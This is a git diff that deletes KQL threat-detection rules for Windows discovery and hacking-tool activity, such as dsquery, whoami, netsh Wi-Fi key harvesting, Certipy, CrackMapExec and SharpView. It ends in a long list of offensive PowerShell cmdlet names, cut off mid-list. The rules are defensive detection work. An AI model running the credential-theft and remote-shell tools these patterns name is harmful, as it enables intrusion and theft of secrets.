diff --git a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql b/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql
deleted file mode 100644
index b4f3e67d..00000000
--- a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects execution of "dsquery.exe" for domain trust discovery
-// Tags: attack.discovery, attack.t1482
-DeviceProcessEvents
-| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe")
\ No newline at end of file
diff --git a/Discovery/DriverQuery.EXE_Execution.kql b/Discovery/DriverQuery.EXE_Execution.kql
deleted file mode 100644
index 3320ae10..00000000
--- a/Discovery/DriverQuery.EXE_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/19
-// Level: medium
-// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql b/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql
deleted file mode 100644
index f77ae57d..00000000
--- a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/12/04
-// Level: medium
-// Description: Detects the execution of "whoami.exe" with the "/all" flag
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql b/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql
deleted file mode 100644
index 18888bf8..00000000
--- a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2021/12/13
-// Level: low
-// Description: Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories.
-
-// Tags: attack.discovery, attack.t1217
-DeviceProcessEvents
-| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql b/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql
deleted file mode 100644
index 01471760..00000000
--- a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2021/12/07
-// Level: low
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1016
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh " and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Fsutil_Drive_Enumeration.kql b/Discovery/Fsutil_Drive_Enumeration.kql
deleted file mode 100644
index 32735e4a..00000000
--- a/Discovery/Fsutil_Drive_Enumeration.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'
-// Date: 2022/03/29
-// Level: low
-// Description: Attackers may leverage fsutil to enumerated connected drives.
-// Tags: attack.discovery, attack.t1120
-DeviceProcessEvents
-| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe")
\ No newline at end of file
diff --git a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql b/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql
deleted file mode 100644
index d9c727d8..00000000
--- a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/08
-// Level: medium
-// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs".
-// Tags: attack.discovery
-DeviceFileEvents
-| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config"
\ No newline at end of file
diff --git a/Discovery/Gpresult_Display_Group_Policy_Information.kql b/Discovery/Gpresult_Display_Group_Policy_Information.kql
deleted file mode 100644
index b1461815..00000000
--- a/Discovery/Gpresult_Display_Group_Policy_Information.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/05/01
-// Level: medium
-// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information
-// Tags: attack.discovery, attack.t1615
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe"
\ No newline at end of file
diff --git a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql b/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql
deleted file mode 100644
index 07d24c69..00000000
--- a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/02/28
-// Level: medium
-// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes.
-// Tags: attack.discovery, attack.t1033
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_Certify_Execution.kql b/Discovery/HackTool_-_Certify_Execution.kql
deleted file mode 100644
index 1f56d25c..00000000
--- a/Discovery/HackTool_-_Certify_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:"))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_Certipy_Execution.kql b/Discovery/HackTool_-_Certipy_Execution.kql
deleted file mode 100644
index 39f45158..00000000
--- a/Discovery/HackTool_-_Certipy_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems)
-// Date: 2023/04/17
-// Level: high
-// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.
-// Tags: attack.discovery, attack.credential_access, attack.t1649
-DeviceProcessEvents
-| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list"))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_CrackMapExec_Execution.kql b/Discovery/HackTool_-_CrackMapExec_Execution.kql
deleted file mode 100644
index 2272759d..00000000
--- a/Discovery/HackTool_-_CrackMapExec_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/25
-// Level: high
-// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.
-// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201
-DeviceProcessEvents
-| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 "))
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql b/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql
deleted file mode 100644
index 0bdef452..00000000
--- a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/12/30
-// Level: medium
-// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects.
-// Tags: attack.discovery
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql b/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql
deleted file mode 100644
index e3ed1e0a..00000000
--- a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/08/29
-// Level: high
-// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller
-// Tags: attack.discovery, attack.t1033, car.2016-03-001
-DeviceProcessEvents
-| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_SharpView_Execution.kql b/Discovery/HackTool_-_SharpView_Execution.kql
deleted file mode 100644
index 4af5cead..00000000
--- a/Discovery/HackTool_-_SharpView_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2021/12/10
-// Level: high
-// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems
-// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess")
\ No newline at end of file
diff --git a/Discovery/HackTool_-_TruffleSnout_Execution.kql b/Discovery/HackTool_-_TruffleSnout_Execution.kql
deleted file mode 100644
index 332dd084..00000000
--- a/Discovery/HackTool_-_TruffleSnout_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/20
-// Level: high
-// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.
-// Tags: attack.discovery, attack.t1482
-DeviceProcessEvents
-| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe"
\ No newline at end of file
diff --git a/Discovery/HackTool_-_WinPwn_Execution.kql b/Discovery/HackTool_-_WinPwn_Execution.kql
deleted file mode 100644
index bd621578..00000000
--- a/Discovery/HackTool_-_WinPwn_Execution.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Swachchhanda Shrawan Poudel
-// Date: 2023/12/04
-// Level: high
-// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
-
-// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1"
\ No newline at end of file
diff --git a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
deleted file mode 100644
index 7d6acba4..00000000
--- a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Andreas Hunkeler (@Karneades), oscd.community
-// Date: 2020/04/20
-// Level: medium
-// Description: Detect the harvesting of wifi credentials using netsh.exe
-// Tags: attack.discovery, attack.credential_access, attack.t1040
-DeviceProcessEvents
-| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Discovery/Local_Accounts_Discovery.kql b/Discovery/Local_Accounts_Discovery.kql
deleted file mode 100644
index c0632ae6..00000000
--- a/Discovery/Local_Accounts_Discovery.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/21
-// Level: low
-// Description: Local accounts, System Owner/User discovery using operating systems utilities
-// Tags: attack.discovery, attack.t1033, attack.t1087.001
-DeviceProcessEvents
-| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or (FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe"))
\ No newline at end of file
diff --git a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index a64283b9..00000000
--- a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2021/12/12
-// Level: low
-// Description: Detects the execution of "wmic" with the "group" flag.
-Adversaries may attempt to find local system groups and permission settings.
-The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.
-Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
-
-// Tags: attack.discovery, attack.t1069.001
-DeviceProcessEvents
-| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
deleted file mode 100644
index dd255075..00000000
--- a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/01/02
-// Level: high
-// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks
-// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or ProcessCommandLine contains "HTTP-Login" or ProcessCommandLine contains "Install-ServiceBinary" or ProcessCommandLine contains "Install-SSP" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-ADRecon" or ProcessCommandLine contains "Invoke-ADSBackdoor" or ProcessCommandLine contains "Invoke-AgentSmith" or ProcessCommandLine contains "Invoke-AllChecks" or ProcessCommandLine contains "Invoke-ARPScan" or ProcessCommandLine contains "Invoke-AzureHound" or ProcessCommandLine contains "Invoke-BackdoorLNK" or ProcessCommandLine contains "Invoke-BadPotato" or ProcessCommandLine contains "Invoke-BetterSafetyKatz" or ProcessCommandLine contains "Invoke-BypassUAC" or ProcessCommandLine contains "Invoke-Carbuncle" or ProcessCommandLine contains "Invoke-Certify" or ProcessCommandLine contains "Invoke-ConPtyShell" or ProcessCommandLine contains "Invoke-CredentialInjection" or ProcessCommandLine contains "Invoke-DAFT" or ProcessCommandLine contains "Invoke-DCSync" or ProcessCommandLine contains "Invoke-DinvokeKatz" or ProcessCommandLine contains "Invoke-DllInjection" or ProcessCommandLine contains "Invoke-DNSUpdate" or ProcessCommandLine contains "Invoke-DomainPasswordSpray" or ProcessCommandLine contains "Invoke-DowngradeAccount" or ProcessCommandLine contains "Invoke-EgressCheck" or ProcessCommandLine contains "Invoke-Eyewitness" or ProcessCommandLine contains "Invoke-FakeLogonScreen" or ProcessCommandLine contains "Invoke-Farmer" or ProcessCommandLine contains "Invoke-Get-RBCD-Threaded" or ProcessCommandLine contains "Invoke-Gopher" or ProcessCommandLine contains "Invoke-Grouper" or ProcessCommandLine contains "Invoke-HandleKatz" or ProcessCommandLine contains "Invoke-ImpersonatedProcess" or ProcessCommandLine contains "Invoke-ImpersonateSystem" or ProcessCommandLine contains "Invoke-InteractiveSystemPowerShell" or ProcessCommandLine contains "Invoke-Internalmonologue" or ProcessCommandLine contains "Invoke-Inveigh" or ProcessCommandLine contains "Invoke-InveighRelay" or ProcessCommandLine contains "Invoke-KrbRelay" or ProcessCommandLine contains "Invoke-LdapSignCheck" or ProcessCommandLine contains "Invoke-Lockless" or ProcessCommandLine contains "Invoke-MalSCCM" or ProcessCommandLine contains "Invoke-Mimikatz" or ProcessCommandLine contains "Invoke-Mimikittenz" or ProcessCommandLine contains "Invoke-MITM6" or ProcessCommandLine contains "Invoke-NanoDump" or ProcessCommandLine contains "Invoke-NetRipper" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "Invoke-NinjaCopy" or ProcessCommandLine contains "Invoke-OfficeScrape" or ProcessCommandLine contains "Invoke-OxidResolver" or ProcessCommandLine contains "Invoke-P0wnedshell" or ProcessCommandLine contains "Invoke-Paranoia" or ProcessCommandLine contains "Invoke-PortScan" or ProcessCommandLine contains "Invoke-PoshRatHttp" or ProcessCommandLine contains "Invoke-PostExfil" or ProcessCommandLine contains "Invoke-PowerDump" or ProcessCommandLine contains "Invoke-PowerShellTCP" or ProcessCommandLine contains "Invoke-PowerShellWMI" or ProcessCommandLine contains "Invoke-PPLDump" or ProcessCommandLine contains "Invoke-PsExec" or ProcessCommandLine contains "Invoke-PSInject" or ProcessCommandLine contains "Invoke-PsUaCme" or ProcessCommandLine contains "Invoke-ReflectivePEInjection" or ProcessCommandLine contains "Invoke-ReverseDNSLookup" or ProcessCommandLine contains "Invoke-Rubeus" or ProcessCommandLine contains "Invoke-RunAs" or ProcessCommandLine contains "Invoke-SafetyKatz" or ProcessCommandLine contains "Invoke-SauronEye" or ProcessCommandLine contains "Invoke-SCShell" or ProcessCommandLine contains "Invoke-Seatbelt" or ProcessCommandLine contains "Invoke-ServiceAbuse" or ProcessCommandLine contains "Invoke-ShadowSpray" or ProcessCommandLine contains "Invoke-Sharp" or ProcessCommandLine contains 